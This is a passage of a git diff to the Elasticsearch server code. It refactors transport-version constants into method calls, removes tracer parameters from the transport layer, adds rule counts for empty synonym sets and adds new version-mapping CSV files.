MappedFieldType.FielddataOperation.SEARCH); + if (indexFieldData instanceof IndexGeoPointFieldData) { + return (IndexGeoPointFieldData) indexFieldData; + } + throw new IllegalArgumentException( + "unable to apply geo distance sort to field [" + fieldName + "] of type [" + fieldType.typeName() + "]" + ); } private Nested nested(SearchExecutionContext context) throws IOException { diff --git a/server/src/main/java/org/elasticsearch/search/sort/ScoreSortBuilder.java b/server/src/main/java/org/elasticsearch/search/sort/ScoreSortBuilder.java index 0977b38585052..e572a451c6d89 100644 --- a/server/src/main/java/org/elasticsearch/search/sort/ScoreSortBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/sort/ScoreSortBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.Scorable; import org.apache.lucene.search.SortField; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.util.BigArrays; @@ -165,7 +164,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/sort/ScriptSortBuilder.java b/server/src/main/java/org/elasticsearch/search/sort/ScriptSortBuilder.java index bd353d0af6c2c..106b483790fe3 100644 --- a/server/src/main/java/org/elasticsearch/search/sort/ScriptSortBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/sort/ScriptSortBuilder.java @@ -452,7 +452,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public enum ScriptSortType implements Writeable { diff --git a/server/src/main/java/org/elasticsearch/search/suggest/completion/CompletionSuggestionBuilder.java b/server/src/main/java/org/elasticsearch/search/suggest/completion/CompletionSuggestionBuilder.java index 19c84f08281b0..efa32f2be2efe 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/completion/CompletionSuggestionBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/completion/CompletionSuggestionBuilder.java @@ -10,7 +10,6 @@ import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -323,7 +322,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/suggest/phrase/Laplace.java b/server/src/main/java/org/elasticsearch/search/suggest/phrase/Laplace.java index fb4e25c22772a..c57996adeb342 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/phrase/Laplace.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/phrase/Laplace.java @@ -13,7 +13,6 @@ import org.apache.lucene.index.Terms; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.suggest.phrase.WordScorer.WordScorerFactory; @@ -123,6 +122,6 @@ public WordScorerFactory buildWordScorerFactory() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/suggest/phrase/LinearInterpolation.java b/server/src/main/java/org/elasticsearch/search/suggest/phrase/LinearInterpolation.java index 2f45b00faa992..2aac73777a321 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/phrase/LinearInterpolation.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/phrase/LinearInterpolation.java @@ -13,7 +13,6 @@ import org.apache.lucene.index.Terms; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -180,6 +179,6 @@ public WordScorerFactory buildWordScorerFactory() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/suggest/phrase/PhraseSuggestionBuilder.java b/server/src/main/java/org/elasticsearch/search/suggest/phrase/PhraseSuggestionBuilder.java index fed2a51f799b9..8e091549bfb4f 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/phrase/PhraseSuggestionBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/phrase/PhraseSuggestionBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.analysis.Analyzer; import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -696,7 +695,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/suggest/phrase/StupidBackoff.java b/server/src/main/java/org/elasticsearch/search/suggest/phrase/StupidBackoff.java index ec5615a14210a..9bceaed77a4b2 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/phrase/StupidBackoff.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/phrase/StupidBackoff.java @@ -13,7 +13,6 @@ import org.apache.lucene.index.Terms; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.suggest.phrase.WordScorer.WordScorerFactory; @@ -126,6 +125,6 @@ public WordScorerFactory buildWordScorerFactory() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/suggest/term/TermSuggestionBuilder.java b/server/src/main/java/org/elasticsearch/search/suggest/term/TermSuggestionBuilder.java index 26fc8d89f3fd1..bda9f087b40e0 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/term/TermSuggestionBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/term/TermSuggestionBuilder.java @@ -17,7 +17,6 @@ import org.apache.lucene.search.spell.StringDistance; import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -461,7 +460,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/snapshots/SnapshotShardsService.java b/server/src/main/java/org/elasticsearch/snapshots/SnapshotShardsService.java index d49b670451f5b..3fd5a226936ac 100644 --- a/server/src/main/java/org/elasticsearch/snapshots/SnapshotShardsService.java +++ b/server/src/main/java/org/elasticsearch/snapshots/SnapshotShardsService.java @@ -411,6 +411,7 @@ private void startNewShardSnapshots(String localNodeId, SnapshotsInProgress.Entr entry.version(), entry.startTime() ); + snapshotStatus.updateStatusDescription("shard snapshot enqueuing to start"); startShardSnapshotTaskRunner.enqueueTask(new ActionListener<>() { @Override public void onResponse(Releasable releasable) { @@ -429,7 +430,6 @@ public void onFailure(Exception e) { assert false : wrapperException; // impossible } }); - snapshotStatus.updateStatusDescription("shard snapshot enqueued to start"); } // apply some backpressure by reserving one SNAPSHOT thread for the startup work diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPathLookup.java b/server/src/main/java/org/elasticsearch/synonyms/SynonymFeatures.java similarity index 51% rename from test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPathLookup.java rename to server/src/main/java/org/elasticsearch/synonyms/SynonymFeatures.java index 915f14c9d1ab8..b42143ed899a3 100644 --- a/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPathLookup.java +++ b/server/src/main/java/org/elasticsearch/synonyms/SynonymFeatures.java @@ -7,25 +7,18 @@ * License v3.0 only", or the "Server Side Public License, v 1". */ -package org.elasticsearch.entitlement.runtime.policy; +package org.elasticsearch.synonyms; -import java.nio.file.Path; -import java.util.stream.Stream; +import org.elasticsearch.features.FeatureSpecification; +import org.elasticsearch.features.NodeFeature; -public class TestPathLookup implements PathLookup { - @Override - public Path pidFile() { - return null; - } +import java.util.Set; - @Override - public Stream getBaseDirPaths(BaseDir baseDir) { - return Stream.empty(); - } +public class SynonymFeatures implements FeatureSpecification { + private static final NodeFeature RETURN_EMPTY_SYNONYM_SETS = new NodeFeature("synonyms_set.get.return_empty_synonym_sets"); @Override - public Stream resolveSettingPaths(BaseDir baseDir, String settingName) { - return Stream.empty(); + public Set getTestFeatures() { + return Set.of(RETURN_EMPTY_SYNONYM_SETS); } - } diff --git a/server/src/main/java/org/elasticsearch/synonyms/SynonymsManagementAPIService.java b/server/src/main/java/org/elasticsearch/synonyms/SynonymsManagementAPIService.java index 70b020eb66ab5..06dce1724d392 100644 --- a/server/src/main/java/org/elasticsearch/synonyms/SynonymsManagementAPIService.java +++ b/server/src/main/java/org/elasticsearch/synonyms/SynonymsManagementAPIService.java @@ -50,6 +50,9 @@ import org.elasticsearch.indices.SystemIndexDescriptor; import org.elasticsearch.rest.RestStatus; import org.elasticsearch.search.aggregations.BucketOrder; +import org.elasticsearch.search.aggregations.bucket.filter.Filters; +import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregationBuilder; +import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregator; import org.elasticsearch.search.aggregations.bucket.terms.Terms; import org.elasticsearch.search.aggregations.bucket.terms.TermsAggregationBuilder; import org.elasticsearch.search.builder.SearchSourceBuilder; @@ -94,6 +97,8 @@ public class SynonymsManagementAPIService { private static final int MAX_SYNONYMS_SETS = 10_000; private static final String SYNONYM_RULE_ID_FIELD = SynonymRule.ID_FIELD.getPreferredName(); private static final String SYNONYM_SETS_AGG_NAME = "synonym_sets_aggr"; + private static final String RULE_COUNT_AGG_NAME = "rule_count"; + private static final String RULE_COUNT_FILTER_KEY = "synonym_rules"; private static final int SYNONYMS_INDEX_MAPPINGS_VERSION = 1; public static final int INDEX_SEARCHABLE_TIMEOUT_SECONDS = 30; private final int maxSynonymsSets; @@ -185,15 +190,33 @@ private static XContentBuilder mappings() { } } + /** + * Returns all synonym sets with their rule counts, including empty synonym sets. + * @param from The index of the first synonym set to return + * @param size The number of synonym sets to return + * @param listener The listener to return the synonym sets to + */ public void getSynonymsSets(int from, int size, ActionListener> listener) { + BoolQueryBuilder synonymSetQuery = QueryBuilders.boolQuery() + .should(QueryBuilders.termQuery(OBJECT_TYPE_FIELD, SYNONYM_SET_OBJECT_TYPE)) + .should(QueryBuilders.termQuery(OBJECT_TYPE_FIELD, SYNONYM_RULE_OBJECT_TYPE)) + .minimumShouldMatch(1); + + // Aggregation query to count only synonym rules (excluding synonym set objects) + FiltersAggregationBuilder ruleCountAggregation = new FiltersAggregationBuilder( + RULE_COUNT_AGG_NAME, + new FiltersAggregator.KeyedFilter(RULE_COUNT_FILTER_KEY, QueryBuilders.termQuery(OBJECT_TYPE_FIELD, SYNONYM_RULE_OBJECT_TYPE)) + ); + client.prepareSearch(SYNONYMS_ALIAS_NAME) .setSize(0) // Retrieves aggregated synonym rules for each synonym set, excluding the synonym set object type - .setQuery(QueryBuilders.termQuery(OBJECT_TYPE_FIELD, SYNONYM_RULE_OBJECT_TYPE)) + .setQuery(synonymSetQuery) .addAggregation( new TermsAggregationBuilder(SYNONYM_SETS_AGG_NAME).field(SYNONYMS_SET_FIELD) .order(BucketOrder.key(true)) .size(maxSynonymsSets) + .subAggregation(ruleCountAggregation) ) .setPreference(Preference.LOCAL.type()) .execute(new ActionListener<>() { @@ -201,11 +224,11 @@ public void getSynonymsSets(int from, int size, ActionListener buckets = termsAggregation.getBuckets(); - SynonymSetSummary[] synonymSetSummaries = buckets.stream() - .skip(from) - .limit(size) - .map(bucket -> new SynonymSetSummary(bucket.getDocCount(), bucket.getKeyAsString())) - .toArray(SynonymSetSummary[]::new); + SynonymSetSummary[] synonymSetSummaries = buckets.stream().skip(from).limit(size).map(bucket -> { + Filters ruleCountFilters = bucket.getAggregations().get(RULE_COUNT_AGG_NAME); + Filters.Bucket ruleCountBucket = ruleCountFilters.getBucketByKey(RULE_COUNT_FILTER_KEY); + return new SynonymSetSummary(ruleCountBucket.getDocCount(), bucket.getKeyAsString()); + }).toArray(SynonymSetSummary[]::new); listener.onResponse(new PagedResult<>(buckets.size(), synonymSetSummaries)); } diff --git a/server/src/main/java/org/elasticsearch/transport/InboundDecoder.java b/server/src/main/java/org/elasticsearch/transport/InboundDecoder.java index 2a9dedf89534a..c2742cf12f863 100644 --- a/server/src/main/java/org/elasticsearch/transport/InboundDecoder.java +++ b/server/src/main/java/org/elasticsearch/transport/InboundDecoder.java @@ -11,7 +11,6 @@ import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.bytes.ReleasableBytesReference; import org.elasticsearch.common.io.stream.StreamInput; @@ -237,7 +236,7 @@ static void checkVersionCompatibility(TransportVersion remoteVersion) { "Received message from unsupported version: [" + remoteVersion.toReleaseVersion() + "] minimal compatible version is: [" - + TransportVersions.MINIMUM_COMPATIBLE.toReleaseVersion() + + TransportVersion.minimumCompatible().toReleaseVersion() + "]" ); } diff --git a/server/src/main/java/org/elasticsearch/transport/OutboundHandler.java b/server/src/main/java/org/elasticsearch/transport/OutboundHandler.java index cab15fffa3fd0..5243d371ae96c 100644 --- a/server/src/main/java/org/elasticsearch/transport/OutboundHandler.java +++ b/server/src/main/java/org/elasticsearch/transport/OutboundHandler.java @@ -433,6 +433,16 @@ private void maybeLogSlowMessage(boolean success) { } }); } catch (RuntimeException ex) { + logger.error( + Strings.format( + "unexpected exception calling sendMessage for transport message [%s] of size [%d] on [%s]", + messageDescription.get(), + messageSize, + channel + ), + ex + ); + assert Thread.currentThread().getName().startsWith("TEST-") : ex; channel.setCloseException(ex); Releasables.closeExpectNoException(() -> listener.onFailure(ex), () -> CloseableChannel.closeChannel(channel)); throw ex; @@ -452,7 +462,7 @@ public boolean rstOnClose() { } private boolean assertValidTransportVersion(TransportVersion transportVersion) { - assert this.version.before(TransportVersions.MINIMUM_COMPATIBLE) // running an incompatible-version test + assert this.version.before(TransportVersion.minimumCompatible()) // running an incompatible-version test || this.version.onOrAfter(transportVersion) : this.version + " vs " + transportVersion; return true; } diff --git a/server/src/main/java/org/elasticsearch/transport/RequestHandlerRegistry.java b/server/src/main/java/org/elasticsearch/transport/RequestHandlerRegistry.java index 84a8ee1b2ebbf..e6cec2a0393e0 100644 --- a/server/src/main/java/org/elasticsearch/transport/RequestHandlerRegistry.java +++ b/server/src/main/java/org/elasticsearch/transport/RequestHandlerRegistry.java @@ -16,7 +16,6 @@ import org.elasticsearch.tasks.CancellableTask; import org.elasticsearch.tasks.Task; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import java.io.IOException; import java.lang.invoke.MethodHandles; @@ -33,7 +32,6 @@ public class RequestHandlerRegistry implements private final boolean canTripCircuitBreaker; private final Executor executor; private final TaskManager taskManager; - private final Tracer tracer; private final Writeable.Reader requestReader; @SuppressWarnings("unused") // only accessed via #STATS_TRACKER_HANDLE, lazy initialized because instances consume non-trivial heap private TransportActionStatsTracker statsTracker; @@ -56,8 +54,7 @@ public RequestHandlerRegistry( TransportRequestHandler handler, Executor executor, boolean forceExecution, - boolean canTripCircuitBreaker, - Tracer tracer + boolean canTripCircuitBreaker ) { this.action = action; this.requestReader = requestReader; @@ -66,7 +63,6 @@ public RequestHandlerRegistry( this.canTripCircuitBreaker = canTripCircuitBreaker; this.executor = executor; this.taskManager = taskManager; - this.tracer = tracer; } public String getAction() { @@ -126,8 +122,7 @@ public static RequestHandlerRegistry replaceHand handler, registry.executor, registry.forceExecution, - registry.canTripCircuitBreaker, - registry.tracer + registry.canTripCircuitBreaker ); } diff --git a/server/src/main/java/org/elasticsearch/transport/TcpTransport.java b/server/src/main/java/org/elasticsearch/transport/TcpTransport.java index 1c7a29e4919ed..24570c544bdea 100644 --- a/server/src/main/java/org/elasticsearch/transport/TcpTransport.java +++ b/server/src/main/java/org/elasticsearch/transport/TcpTransport.java @@ -1134,7 +1134,7 @@ public void onResponse(Void v) { nodeChannels.channels.forEach(ch -> { // Mark the channel init time ch.getChannelStats().markAccessed(relativeMillisTime); - ch.addCloseListener(new ActionListener() { + ch.addCloseListener(new ActionListener<>() { @Override public void onResponse(Void ignored) { nodeChannels.close(); @@ -1142,7 +1142,7 @@ public void onResponse(Void ignored) { @Override public void onFailure(Exception e) { - nodeChannels.closeAndFail(e); + nodeChannels.closeAndFail(new NodeDisconnectedException(node, "closed exceptionally: " + ch, null, e)); } }); }); diff --git a/server/src/main/java/org/elasticsearch/transport/TransportHandshaker.java b/server/src/main/java/org/elasticsearch/transport/TransportHandshaker.java index fcbadac54a89e..e26d9ac3893a2 100644 --- a/server/src/main/java/org/elasticsearch/transport/TransportHandshaker.java +++ b/server/src/main/java/org/elasticsearch/transport/TransportHandshaker.java @@ -11,7 +11,6 @@ import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.common.bytes.BytesReference; @@ -232,7 +231,7 @@ private static TransportVersion ensureCompatibleVersion( return localTransportVersion; } final var bestKnownVersion = remoteTransportVersion.bestKnownVersion(); - if (bestKnownVersion.equals(TransportVersions.ZERO) == false) { + if (bestKnownVersion.equals(TransportVersion.zero()) == false) { if (bestKnownVersion.equals(remoteTransportVersion) == false) { // Remote is semantically older than us (i.e. has a lower transport protocol version), but we do not know its exact // transport protocol version so it must be chronologically newer. We recommend not doing this, it implies an upgrade diff --git a/server/src/main/java/org/elasticsearch/transport/TransportService.java b/server/src/main/java/org/elasticsearch/transport/TransportService.java index 7e81e72e7d457..a23a6f3367351 100644 --- a/server/src/main/java/org/elasticsearch/transport/TransportService.java +++ b/server/src/main/java/org/elasticsearch/transport/TransportService.java @@ -48,7 +48,6 @@ import org.elasticsearch.node.ReportingService; import org.elasticsearch.tasks.Task; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.threadpool.Scheduler; import org.elasticsearch.threadpool.ThreadPool; @@ -134,7 +133,6 @@ protected boolean removeEldestEntry(Map.Entry eldest) { // tracer log private static final Logger tracerLog = Loggers.getLogger(logger, ".tracer"); - private final Tracer tracer; volatile String[] tracerLogInclude; volatile String[] tracerLogExclude; @@ -206,18 +204,6 @@ public String toString() { } }; - public TransportService( - Settings settings, - Transport transport, - ThreadPool threadPool, - TransportInterceptor transportInterceptor, - Function localNodeFactory, - @Nullable ClusterSettings clusterSettings, - Set taskHeaders - ) { - this(settings, transport, threadPool, transportInterceptor, localNodeFactory, clusterSettings, taskHeaders, Tracer.NOOP); - } - /** * Build the service. * @@ -232,8 +218,7 @@ public TransportService( TransportInterceptor transportInterceptor, Function localNodeFactory, @Nullable ClusterSettings clusterSettings, - TaskManager taskManager, - Tracer tracer + TaskManager taskManager ) { this( settings, @@ -243,8 +228,7 @@ public TransportService( localNodeFactory, clusterSettings, new ClusterConnectionManager(settings, transport, threadPool.getThreadContext()), - taskManager, - tracer + taskManager ); } @@ -256,8 +240,7 @@ public TransportService( TransportInterceptor transportInterceptor, Function localNodeFactory, @Nullable ClusterSettings clusterSettings, - Set taskHeaders, - Tracer tracer + Set taskHeaders ) { this( settings, @@ -267,8 +250,7 @@ public TransportService( localNodeFactory, clusterSettings, new ClusterConnectionManager(settings, transport, threadPool.getThreadContext()), - new TaskManager(settings, threadPool, taskHeaders), - tracer + new TaskManager(settings, threadPool, taskHeaders) ); } @@ -281,15 +263,13 @@ public TransportService( Function localNodeFactory, @Nullable ClusterSettings clusterSettings, ConnectionManager connectionManager, - TaskManager taskManger, - Tracer tracer + TaskManager taskManger ) { this.transport = transport; transport.setSlowLogThreshold(TransportSettings.SLOW_OPERATION_THRESHOLD_SETTING.get(settings)); this.threadPool = threadPool; this.localNodeFactory = localNodeFactory; this.connectionManager = connectionManager; - this.tracer = tracer; this.clusterName = ClusterName.CLUSTER_NAME_SETTING.get(settings); setTracerLogInclude(TransportSettings.TRACE_LOG_INCLUDE_SETTING.get(settings)); setTracerLogExclude(TransportSettings.TRACE_LOG_EXCLUDE_SETTING.get(settings)); @@ -1214,8 +1194,7 @@ public void registerRequestHandler( handler, executor, false, - true, - tracer + true ); transport.registerRequestHandler(reg); } @@ -1247,8 +1226,7 @@ public void registerRequestHandler( handler, executor, forceExecution, - canTripCircuitBreaker, - tracer + canTripCircuitBreaker ); transport.registerRequestHandler(reg); } diff --git a/server/src/main/resources/META-INF/services/org.elasticsearch.features.FeatureSpecification b/server/src/main/resources/META-INF/services/org.elasticsearch.features.FeatureSpecification index 14749330f09da..4cc2e658e798d 100644 --- a/server/src/main/resources/META-INF/services/org.elasticsearch.features.FeatureSpecification +++ b/server/src/main/resources/META-INF/services/org.elasticsearch.features.FeatureSpecification @@ -14,6 +14,7 @@ org.elasticsearch.rest.action.admin.cluster.GetSnapshotsFeatures org.elasticsearch.index.IndexFeatures org.elasticsearch.index.mapper.MapperFeatures org.elasticsearch.search.SearchFeatures +org.elasticsearch.synonyms.SynonymFeatures org.elasticsearch.search.retriever.RetrieversFeatures org.elasticsearch.script.ScriptFeatures org.elasticsearch.cluster.routing.RoutingFeatures diff --git a/server/src/main/resources/org/elasticsearch/TransportVersions.csv b/server/src/main/resources/org/elasticsearch/TransportVersions.csv index 58c5afa760383..c613d6f41c9fb 100644 --- a/server/src/main/resources/org/elasticsearch/TransportVersions.csv +++ b/server/src/main/resources/org/elasticsearch/TransportVersions.csv @@ -149,11 +149,27 @@ 8.17.6,8797006 8.17.7,8797007 8.17.8,8797008 +8.17.9,8797009 +8.17.10,8797010 8.18.0,8840002 8.18.1,8840003 8.18.2,8840004 8.18.3,8840005 +8.18.4,8840006 +8.18.5,8840007 +8.18.6,8840008 +8.19.0,8841064 +8.19.1,8841065 +8.19.2,8841066 +8.19.3,8841067 9.0.0,9000009 9.0.1,9000010 9.0.2,9000011 9.0.3,9000012 +9.0.4,9000013 +9.0.5,9000014 +9.0.6,9000015 +9.1.0,9112003 +9.1.1,9112004 +9.1.2,9112005 +9.1.3,9112006 diff --git a/server/src/main/resources/org/elasticsearch/index/IndexVersions.csv b/server/src/main/resources/org/elasticsearch/index/IndexVersions.csv index 058080bb5725a..fa5475e847067 100644 --- a/server/src/main/resources/org/elasticsearch/index/IndexVersions.csv +++ b/server/src/main/resources/org/elasticsearch/index/IndexVersions.csv @@ -149,11 +149,27 @@ 8.17.6,8521000 8.17.7,8521000 8.17.8,8521000 +8.17.9,8521000 +8.17.10,8521000 8.18.0,8525000 8.18.1,8525000 8.18.2,8525000 8.18.3,8525000 +8.18.4,8525000 +8.18.5,8525000 +8.18.6,8525000 +8.19.0,8536000 +8.19.1,8536000 +8.19.2,8536000 +8.19.3,8536000 9.0.0,9009000 9.0.1,9009000 9.0.2,9009000 9.0.3,9009000 +9.0.4,9009000 +9.0.5,9009000 +9.0.6,9009000 +9.1.0,9033000 +9.1.1,9033000 +9.1.2,9033000 +9.1.3,9033000 diff --git a/server/src/main/resources/transport/constants/minimum_ccs_version.csv b/server/src/main/resources/transport/constants/minimum_ccs_version.csv new file mode 100644 index 0000000000000..d5a7a223b3bb5 --- /dev/null +++ b/server/src/main/resources/transport/constants/minimum_ccs_version.csv @@ -0,0 +1 @@ +9000012 diff --git a/server/src/main/resources/transport/constants/minimum_compatible.csv b/server/src/main/resources/transport/constants/minimum_compatible.csv new file mode 100644 index 0000000000000..16c1a5e6cdf1d --- /dev/null +++ b/server/src/main/resources/transport/constants/minimum_compatible.csv @@ -0,0 +1 @@ +8841000 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_5.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_5.csv new file mode 100644 index 0000000000000..a22b09457dfb3 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_5.csv @@ -0,0 +1 @@ +8840007 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_6.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_6.csv new file mode 100644 index 0000000000000..0ff8fc01e91e4 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_6.csv @@ -0,0 +1 @@ +8840008 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_19_3.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_19_3.csv new file mode 100644 index 0000000000000..20882a00fd857 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_19_3.csv @@ -0,0 +1 @@ +8841067 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_5.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_5.csv new file mode 100644 index 0000000000000..4615ee4f02e0e --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_5.csv @@ -0,0 +1 @@ +9000014 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_6.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_6.csv new file mode 100644 index 0000000000000..9cbaf3dd8c2b0 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_6.csv @@ -0,0 +1 @@ +9000015 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_1_3.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_1_3.csv new file mode 100644 index 0000000000000..9cba3c528df76 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_1_3.csv @@ -0,0 +1 @@ +9112006 diff --git a/server/src/main/resources/transport/upper_bounds/8.18.csv b/server/src/main/resources/transport/upper_bounds/8.18.csv new file mode 100644 index 0000000000000..4eb5140004ea6 --- /dev/null +++ b/server/src/main/resources/transport/upper_bounds/8.18.csv @@ -0,0 +1 @@ +initial_elasticsearch_8_18_6,8840008 diff --git a/server/src/main/resources/transport/upper_bounds/8.19.csv b/server/src/main/resources/transport/upper_bounds/8.19.csv new file mode 100644 index 0000000000000..476468b203875 --- /dev/null +++ b/server/src/main/resources/transport/upper_bounds/8.19.csv @@ -0,0 +1 @@ +initial_elasticsearch_8_19_3,8841067 diff --git a/server/src/main/resources/transport/upper_bounds/9.0.csv b/server/src/main/resources/transport/upper_bounds/9.0.csv new file mode 100644 index 0000000000000..f8f50cc6d7839 --- /dev/null +++ b/server/src/main/resources/transport/upper_bounds/9.0.csv @@ -0,0 +1 @@ +initial_elasticsearch_9_0_6,9000015 diff --git a/server/src/main/resources/transport/upper_bounds/9.1.csv b/server/src/main/resources/transport/upper_bounds/9.1.csv new file mode 100644 index 0000000000000..079475f1a2f66 --- /dev/null +++ b/server/src/main/resources/transport/upper_bounds/9.1.csv @@ -0,0 +1 @@ +initial_elasticsearch_9_1_3,9112006 diff --git a/server/src/test/java/org/elasticsearch/ExceptionSerializationTests.java b/server/src/test/java/org/elasticsearch/ExceptionSerializationTests.java index bfa897173a368..dba50a794a780 100644 --- a/server/src/test/java/org/elasticsearch/ExceptionSerializationTests.java +++ b/server/src/test/java/org/elasticsearch/ExceptionSerializationTests.java @@ -217,7 +217,9 @@ public FileVisitResult postVisitDirectory(Path dir, IOException exc) { }; Files.walkFileTree(startPath, visitor); - final Path testStartPath = PathUtils.get(ExceptionSerializationTests.class.getResource(path).toURI()); + final Path testStartPath = PathUtils.get( + ElasticsearchExceptionTests.class.getProtectionDomain().getCodeSource().getLocation().toURI() + ).resolve("org").resolve("elasticsearch"); Files.walkFileTree(testStartPath, visitor); assertTrue(notRegistered.remove(TestException.class)); assertTrue(notRegistered.remove(UnknownHeaderException.class)); diff --git a/server/src/test/java/org/elasticsearch/TransportVersionTests.java b/server/src/test/java/org/elasticsearch/TransportVersionTests.java index 9b02b66583e78..761ae19dbad7d 100644 --- a/server/src/test/java/org/elasticsearch/TransportVersionTests.java +++ b/server/src/test/java/org/elasticsearch/TransportVersionTests.java @@ -12,7 +12,12 @@ import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.TransportVersionUtils; +import java.io.BufferedReader; +import java.io.ByteArrayInputStream; +import java.io.InputStreamReader; import java.lang.reflect.Modifier; +import java.nio.charset.StandardCharsets; +import java.util.List; import java.util.Set; import java.util.regex.Matcher; import java.util.regex.Pattern; @@ -169,7 +174,7 @@ public void testIsPatchFrom() { } public void testVersionConstantPresent() { - Set ignore = Set.of(TransportVersions.ZERO, TransportVersion.current(), TransportVersions.MINIMUM_COMPATIBLE); + Set ignore = Set.of(TransportVersion.zero(), TransportVersion.current(), TransportVersion.minimumCompatible()); assertThat(TransportVersion.current(), sameInstance(TransportVersion.fromId(TransportVersion.current().id()))); final int iters = scaledRandomIntBetween(20, 100); for (int i = 0; i < iters; i++) { @@ -207,4 +212,146 @@ public void testToString() { assertEquals("2000099", TransportVersion.fromId(2_00_00_99).toString()); assertEquals("5000099", 